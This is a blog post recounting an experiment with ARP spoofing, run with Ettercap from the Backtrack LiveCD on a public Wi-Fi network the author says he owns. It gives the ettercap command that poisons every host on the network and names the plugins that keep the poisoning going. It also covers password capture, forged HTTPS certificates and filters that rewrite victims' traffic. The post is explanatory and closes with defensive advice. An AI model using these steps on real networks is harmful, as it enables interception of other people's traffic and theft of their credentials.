She turned me into a Gnewt! I got better…

NOTHING I SAY IS TRUE, AND IF YOU TRY IT, YOUR COMPUTER WILL EXPLODE AND YOUR FRIENDS WILL ALL TURN AGAINST YOU. On a more serious note, doing this on a network you don’t own is illegal. Don’t.

Recently, I downloaded a copy of the penetration testing OS Backtrack. This is a great Linux LiveCD that includes many tools for security testing. One of the things that I really wanted to try out was ARP spoofing. For those who aren’t familiar, here’s a little explanation.

On a normal network, when computer A wants to connect to computer B, they do so through the router. In order to find out how to contact the computer, they send out an “ARP Request,” which looks something like “Who has 192.168.1.10? Tell 192.168.1.11.” The router replies accordingly, giving the MAC address (basically the physical address on the network) to the requesting computer. The problem with this is that there’s no security. If Attacker C gets on to the network with a mac address of 11:22:33:44:55:66, and then sends this out:

• 192.168.1.1 is at 11:22:33:44:55:66
• 192.168.1.10 is at 11:22:33:44:55:66
• 192.168.1.11 is at 11:22:33:44:55:66

Suddenly, the whole network thinks Computer A, Computer B, and the router are all located at Attacker C’s MAC address. This means all the traffic is routed to the attacker. If Attacker C has IP forwarding enabled, there will be no interruption in browsing for Computer A or B. Their traffic will simply be passed on, but it will be traveling through Attacker C’s computer. Why is this dangerous you ask? I’ll explain more in the next section. I decided to check this out using a tool called Ettercap, which can do much more than just rerouting traffic. Ettercap comes included on the Backtrack Linux LiveCD I mentioned earlier, which means that anybody can download the file, put it on a CD or USB stick, and boot up into a fully dangerous Linux OS without making any change to their system. I downloaded the USB version and put it on a USB stick, then booted into it.

It took a few minutes to set up my network card, but I’m not going to go into that process this time. Once the network card was set up and ready, I was sitting in front of a fully ready attack/pentesting operating system. I decided to take it to a local public place network that I own with an open WiFi network. This is when I fully realized how insecure ARP is.

I took my laptop to the public place network that I own and sat down, opened up my laptop and connected to the wireless network. There’s a simple Ettercap command that just reroutes all traffic on the network using an ARP poisoning attack.

ettercap -T -q -M ARP // //

This doesn’t run any special filters or anything, but it does spoof to every computer on the network, meaning all their traffic is flowing through your computer. By default, ettercap collects passwords in plaintext and over HTTPS by certificate spoofing. Every HTTPS website has a unique and securely signed certificate that it provides to the browser to prove the site’s authenticity. When ARP spoofing is enabled, ettercap automatically forges these certificates, but it’s not perfect: they’re detected as not authentic by the browser. You may think that this would make people realize something is wrong, but people just click straight through and log into whatever it is they’re trying to access. This is a HUGE problem, and it’s human error.

I enabled two ettercap plugins after I started my spoofing session by pressing “p” and typing the name of the plugins. The plugins were autoadd and repoison_arp. These names are fairly self-explanatory. autoadd automatically detects new hosts on the netwok and adds them to the poisoning list, and repoison_arp keeps sending false ARP replies during the whole session.

The plugin chk_poison told me that my “attack” was working, but I wanted to check for myself, so I opened up Wireshark, my favorite network analyzer. Suddenly I saw everybody’s web traffic passing through my computer. The “attack” was indeed successful.

This default setup that captures passwords is enough for most attackers to do a lot of damage, but I decided to have a little fun, while remaining non-malicious. For this I called upon Ettercap’s filters, which can replace data in a TCP stream in realtime (and a lot of other cool stuff). I used the info and example code listed at IronGeek’s article about Ettercap filters to replace images on any website that people visited with an image of the hypnotoad. It worked great! Anywhere someone on the network tried to browse, they’d get images of the hypnotoad in place of their real images. This was just a proof of concept, and definitely wasn’t going to harm anybody’s computers, but if an attacker wanted to run arbitrary code on another person’s computer, they could do it easily using something like this.

It really all wraps up to this: the internet itself is broken. Stuff is insecure and easily exploitable. Make sure you always use a little common sense. When your browser warns you that Gmail is using an invalid security certificate, don’t just click through it. Warning are put there for a reason. Anyone interested in protecting their network against ARP poisoning should read this paper.

Feel free to yell at me, correct me, or suggest I change things by writing a comment.